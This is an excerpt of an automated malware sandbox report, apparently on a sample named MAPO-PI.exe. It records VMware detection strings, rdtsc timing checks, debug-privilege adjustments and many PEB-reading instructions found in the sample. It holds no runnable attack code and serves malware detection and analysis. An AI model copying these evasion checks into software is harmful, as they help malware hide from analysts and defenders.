Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\MAPO-PI.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h] 3_2_018BC182
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA185 mov eax, dword ptr fs:[00000030h] 3_2_018CA185
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2990 mov eax, dword ptr fs:[00000030h] 3_2_018C2990
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C61A0 mov eax, dword ptr fs:[00000030h] 3_2_018C61A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019151BE mov eax, dword ptr fs:[00000030h] 3_2_019151BE
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019549A4 mov eax, dword ptr fs:[00000030h] 3_2_019549A4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov ecx, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B99BF mov eax, dword ptr fs:[00000030h] 3_2_018B99BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019169A6 mov eax, dword ptr fs:[00000030h] 3_2_019169A6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0189B1E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019241E8 mov eax, dword ptr fs:[00000030h] 3_2_019241E8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899100 mov eax, dword ptr fs:[00000030h] 3_2_01899100
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov eax, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B4120 mov ecx, dword ptr fs:[00000030h] 3_2_018B4120
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C513A mov eax, dword ptr fs:[00000030h] 3_2_018C513A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB944 mov eax, dword ptr fs:[00000030h] 3_2_018BB944
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189C962 mov eax, dword ptr fs:[00000030h] 3_2_0189C962
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189B171 mov eax, dword ptr fs:[00000030h] 3_2_0189B171
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899080 mov eax, dword ptr fs:[00000030h] 3_2_01899080
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913884 mov eax, dword ptr fs:[00000030h] 3_2_01913884
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D90AF mov eax, dword ptr fs:[00000030h] 3_2_018D90AF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C20A0 mov eax, dword ptr fs:[00000030h] 3_2_018C20A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov ecx, dword ptr fs:[00000030h] 3_2_018CF0BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CF0BF mov eax, dword ptr fs:[00000030h] 3_2_018CF0BF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_0192B8D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018958EC mov eax, dword ptr fs:[00000030h] 3_2_018958EC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018940E1 mov eax, dword ptr fs:[00000030h] 3_2_018940E1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BB8E4 mov eax, dword ptr fs:[00000030h] 3_2_018BB8E4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01964015 mov eax, dword ptr fs:[00000030h] 3_2_01964015
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917016 mov eax, dword ptr fs:[00000030h] 3_2_01917016
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AB02A mov eax, dword ptr fs:[00000030h] 3_2_018AB02A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C002D mov eax, dword ptr fs:[00000030h] 3_2_018C002D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h] 3_2_018B0050
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01961074 mov eax, dword ptr fs:[00000030h] 3_2_01961074
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952073 mov eax, dword ptr fs:[00000030h] 3_2_01952073
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h] 3_2_018A1B8F
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h] 3_2_0194D380
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h] 3_2_018C2397
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h] 3_2_018CB390
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195138A mov eax, dword ptr fs:[00000030h] 3_2_0195138A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h] 3_2_018C4BAD
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h] 3_2_01965BA5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019153CA mov eax, dword ptr fs:[00000030h] 3_2_019153CA
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h] 3_2_018BDBE9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h] 3_2_018C03E2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h] 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h] 3_2_019423E3
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h] 3_2_018BA309
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195131B mov eax, dword ptr fs:[00000030h] 3_2_0195131B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189DB40 mov eax, dword ptr fs:[00000030h] 3_2_0189DB40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968B58 mov eax, dword ptr fs:[00000030h] 3_2_01968B58
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189F358 mov eax, dword ptr fs:[00000030h] 3_2_0189F358
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189DB60 mov ecx, dword ptr fs:[00000030h] 3_2_0189DB60
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C3B7A mov eax, dword ptr fs:[00000030h] 3_2_018C3B7A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h] 3_2_018CD294
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h] 3_2_018952A5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h] 3_2_018AAAB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h] 3_2_018CFAB0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h] 3_2_018C2ACB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h] 3_2_018C2AE4
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954AEF mov eax, dword ptr fs:[00000030h] 3_2_01954AEF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h] 3_2_018A8A0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h] 3_2_0195AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h] 3_2_018B3A1C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h] 3_2_01895210
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h] 3_2_0189AA16
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h] 3_2_018D4A2C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h] 3_2_018BA229
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h] 3_2_0195EA55
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01924257 mov eax, dword ptr fs:[00000030h] 3_2_01924257
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h] 3_2_01899240
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h] 3_2_0194B260
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h] 3_2_01968A62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D927A mov eax, dword ptr fs:[00000030h] 3_2_018D927A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h] 3_2_01892D8A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h] 3_2_018C2581
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h] 3_2_018CFD9B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h] 3_2_018CFD9B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01952D82 mov eax, dword ptr fs:[00000030h] 3_2_01952D82
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h] 3_2_018C35A1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h] 3_2_018C1DB5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h] 3_2_019605AC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h] 3_2_019605AC
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h] 3_2_01916DC9
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h] 3_2_01948DF1
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h] 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h] 3_2_018AD5E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0195FDE2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h] 3_2_01968D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h] 3_2_0191A537
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h] 3_2_0195E539
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h] 3_2_018C4D3B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h] 3_2_0189AD30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h] 3_2_018A3D34
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h] 3_2_018D3D43
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01913540 mov eax, dword ptr fs:[00000030h] 3_2_01913540
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h] 3_2_01943D40
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h] 3_2_018B7D50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h] 3_2_018BC577
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h] 3_2_018BC577
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01954496 mov eax, dword ptr fs:[00000030h] 3_2_01954496
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A849B mov eax, dword ptr fs:[00000030h] 3_2_018A849B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h] 3_2_01968CD6
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h] 3_2_01916CF0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_019514FB mov eax, dword ptr fs:[00000030h] 3_2_019514FB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h] 3_2_01951C06
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h] 3_2_0196740D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h] 3_2_01916C0A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h] 3_2_018CBC2C
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h] 3_2_0192C450
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h] 3_2_0192C450
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h] 3_2_018CA44B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018B746D mov eax, dword ptr fs:[00000030h] 3_2_018B746D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h] 3_2_018CAC7B
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h] 3_2_01917794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h] 3_2_018A8794
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h] 3_2_018D37F5
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h] 3_2_0192FF10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h] 3_2_0192FF10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h] 3_2_018CA70E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h] 3_2_018CA70E
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h] 3_2_0196070D
